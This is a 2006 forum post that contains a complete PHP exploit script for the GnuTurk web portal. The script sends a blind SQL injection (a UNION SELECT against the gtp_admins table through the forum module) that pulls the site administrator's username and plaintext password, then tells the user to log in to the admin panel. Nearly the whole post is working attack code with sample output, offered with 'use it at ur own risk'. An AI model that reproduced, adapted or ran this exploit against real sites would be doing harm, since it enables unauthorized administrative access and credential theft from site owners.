Gonzalez Posted October 3, 2006 Report Posted October 3, 2006 <?/*--------------------------------------------------------------------------------------------------------------------Gnu turk all versions simple get admin uname & pass without hash blind sql injection exploit--------------- -------------Powered by p2y --------------- ---------------Use it at ur own RisK ----------------------------------------------------------------------------------------------------------------------------------p2y@p2y:~/Desktop/projects$ php gnuturk.php 127.0.0.1 /portals/gnuturk/ 1--------------------------------Powered by p2yAdmin username : p2yAdmin password : sananeN0w go 2 http://127.0.0.1/portals/gnuturk/admin/ and login with this inf0rmationCuz n0where is Secure En0ugh ...--------------------------------*///simple get admin username && pass exploit by p2yerror_reporting(0);$site=$argv[1];$path=$argv[2];$id=$argv[3];if($site && $path && $id){if(!ereg("http",$site)) $site="http://".$site;$sql="mods.php?go=Forum&p=vtop&t_id=-2%20Union/**/Select/**/1,2,username,password,5,6,7,8,9/**/From/**/gtp_admins/**/WHERE/**/id=$id/*";$url=$site.$path.$sql;$html=file_get_contents($url);$tmp=explode("/*>",$html);$rtmp=explode("</a>",$tmp[1]);$a_username=$rtmp[0];$tmp=explode('<td class="forum_msg" valign="top">',$html);$rtmp=explode("</td>",$tmp[1]);$a_pass=$rtmp[0];echo "--------------------------------n";echo "Powered by p2yn";echo "Admin username : $a_usernamen";echo "Admin password : $a_passn";echo "N0w go 2 $site$path"."admin/ and login with this inf0rmationn";echo "Cuz n0where is Secure En0ugh ...n";echo "--------------------------------n";}else{echo "--------------------------------n";echo "Powered by p2yn";echo "Enter host path admin idn";echo "usage = php p2y.php 127.0.0.1 /gnu/ 1n";echo "Cuz n0where is Secure En0ugh ...n";echo "--------------------------------n";}?> Quote
